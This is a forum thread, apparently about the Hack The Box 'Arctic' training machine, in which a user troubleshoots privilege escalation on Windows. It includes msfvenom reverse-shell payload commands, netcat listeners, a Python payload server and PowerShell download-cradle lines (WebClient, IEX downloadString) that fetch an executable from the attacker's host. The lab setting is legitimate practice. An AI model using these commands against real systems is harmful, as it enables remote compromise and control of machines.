Arctic

Having privesc issues with this box.

Tried following an IppSec video and the official write-up.

Please, I would like a non-meterpreter solution.

Basically so far I’m able to get the user shell pretty easily with

searchsploit coldfusion
Adobe ColdFusion Server 8.0.1 - ‘administrator/logviewer/searchlog.cfm?startRow’ Cross-Site Scripting | exploits/cfm/webapps/33168.txt

// I browse to the payload and activate it.

nc -lvnp 4444

// I now have user shell tolis and get user.txt

// Next I build my payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=5432 -f exe > exploit2.exe

nc -lvnp 5432

// I set up my web server in the directory where I am working on this box.

python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 …

// It is listening on port 8000.

// I name my msfvenom payload as exploit2.exe and make sure that it is in my web server.

// I run the next command in my Windows user shell and it doesn’t work. No status updates in my web server terminal.

powershell “(new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)"
powershell (new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)

// try IEX

powershell “IEX(new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)”
powershell IEX(new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)

// Try these

powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.3:8000/exploit2.exe’)”
powershell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.3:8000/exploit2.exe’)

// This last one is the only one that got a response in my mini web server. Despite IppSec and the official writeup’s instructions. For some reason the double quotes are giving the shell bad characters (diamond with a question mark) and seems to not like the command.

// Now my issue is that the payload does not seem to execute. My nc 5432 listener returns nothing.

// Trying a different payload.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=5432 -f exe > exploit3.exe

// Tried these

powershell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.3:8000/exploit3.exe’)

// Still nothing. Any thoughts?

Does it actually download the file, or is it trying to automatically execute? I think this method only works if the requested file contains a PowerShell exploit. I’m having a pig of a time getting an exploit onto the box: FTP with a config file isn’t working, I can’t get PowerShell to work, and the write-up saying to change the timers in Metasploit doesn’t appear to work either - feels like I’m missing something major.

Never could get that to work - I think the FTP issue is related to not being able to switch to passive - a common VBS script works.